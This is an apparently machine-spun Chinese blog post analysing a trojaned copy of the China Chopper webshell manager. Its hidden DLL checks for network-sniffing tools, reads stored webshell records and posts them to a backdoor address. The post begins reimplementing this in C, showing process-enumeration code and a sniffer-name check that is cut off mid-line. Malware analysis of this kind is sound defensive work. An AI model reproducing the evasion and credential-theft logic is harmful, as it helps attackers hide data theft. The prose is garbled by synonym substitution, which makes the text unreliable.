中国菜刀-它到底做错了什么?
中国菜刀-它究竟做不对哪些?
前因后果
很长过段时间一直忙里偷闲,但做为人们都要做些哪些,否则会发疯,因此我挑选了一天到晚在群里瞎胡扯,瞎胡扯都是门大学问,扯的好或是不太好,都不可以把这一淡长期的扯下去,因此我刚开始找寻哪个说白了的均衡-咸中带淡、淡中带咸,只有这并不是重中之重,这儿也不表了。在近期的瞎胡扯中有堂哥说搜集上了这款中国菜刀,这个中国菜刀不同寻常,别人动了手和脚,因此总有了下文。
爱之初体验
获得样版后,立即压解,发觉很清新就5个文档和文件夹名称,也对伐,中国菜刀原本也没好多个文档和文件夹名称,如下图所示:
看过一下下标志应当是13款的中国菜刀,可是db.tmp是什么玩意?WTF!先给db.tmp重命名为db.tmp.bak,再开启caidao.exe发觉立即系统错误了,如下图所示:
见到上边的出错,立即能够确实db.tmp是1个dll文档,确实许多人会提出质疑为何并不是临时文件呢?立即用C32asm开启看一下文档头吧,如下图所示:
家里的临时文件张那样么?又有杠精会提出质疑为何并不是exe呢?把db.tmp.bak改成db.tmp,一切正常开启中国菜刀,应用火绒内嵌的火绒剑查询caidao.exe系统进程应用的控制模块,发觉目录中存有db.tmp,如下图所示:
这儿重中之重安利一下火绒的火绒剑,剖析就用火绒剑,网络黑客用了都答应,美乐家完毕,说回正题。
都了解db.tmp是dll了,也别藏着掖着了,立即更名叫db.dll患上,清楚一目了然。应用C32asm开启db.dll文档,看一下大葫芦里都卖的什药。
慢慢的走慢慢看,渐渐向下翻,翻过山和海洋在一望无际空格符中见到了,措不及防的粗俗,要我痛心到喘不过气来,如下图所示:
强忍痛心再次向下看,越过熙熙攘攘在一望无际空格符中又见到了,别在拆磨我了,俗语说:因此情深留不住,只能套路得人心。来个套路吧!别再深情告白了,各位看官都跑了,如下图所示:
谁TM还没有点小性子,再TM出現我TM不看了,即使做咸鱼,我TM还要做最咸的那这条!
再次向下看,发觉存有对系统进程的实际操作,及其N多流量统计专用工具的系统进程名,如下图所示:
再次向下看,发觉对数据库查询开展联接,并获得了表的所有统计数据,如下图所示:
这一表里边储存的是什么?开启中国菜刀并加上统计数据,如下图所示:
应用专用工具查询db.mdb数据库查询表的內容,发觉储存的是shell纪录,如下图所示:
再向下看,发觉侧门详细地址,如下图所示:
相关爱之初体验阶段能够小结为,根据对caidao.exe文档开展改动,使caidao.exe载入db.tmp文档,对db.tmp文档剖析获知该文档是dll,该dll建立的作用能够小结给出:
分辨系统进程名中是不是存有流量统计专用工具
连接数据库并获得shell信息内容
应用.compost请求传送shell信息内容
爱之再试探
对爱之初体验阶段小结的作用应用编码开展复现。
分辨某一系统进程名是不是存有
#include"tlhelp32.h"
DWORD GetProcessIdFromName(LPCWSTR name)
{
PROCESSENTRY32 pE;
DWORD Id = 0;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pE.dwSize = sizeof(PROCESSENTRY32);
if (!Process32First(hSnapshot, &pE))
return 0;
while (1)
{
pE.dwSize = sizeof(PROCESSENTRY32);
if (Process32Next(hSnapshot, &pE) == FALSE)
break;
if (wcscmp(pE.szExeFile, name) == 0)
{
Id = pE.th32ProcessID;
break;
}
}
CloseHandle(hSnapshot);
return Id;
}
if(GetProcessIdFromName(_T("calc.exe")) || GetProcessIdFromName(_T("WSockExpert_fr.exe")) || GetProcessIdFromName(_T("WSockExpert.exe")) || GetProcessIdFromName(_T("CHKenCap.exe")) || GetProcessIdFromName(_T("SmartSniff.exe")) || GetProcessIdFromNa
相关文章
- 4条评论
- 冬马芩酌2022-05-28 04:10:29
- nbsp; { Id = pE.th32ProcessID; break;
- 礼忱苍阶2022-05-28 06:37:50
- nbsp; if (!Process32First(hSnapshot, &pE)) return 0; while (1)&n
- 泪灼矫纵2022-05-28 06:59:56
- mp(pE.szExeFile, name) == 0) { I
- 弦久觅遇2022-05-28 04:31:01
- 展改动,使caidao.exe载入db.tmp文档,对db.tmp文档剖析获知该文档是dll,该dll建立的作用能够小结给出:分辨系统进程名中是不是存有流量统计专用工具连接数据库并获得shel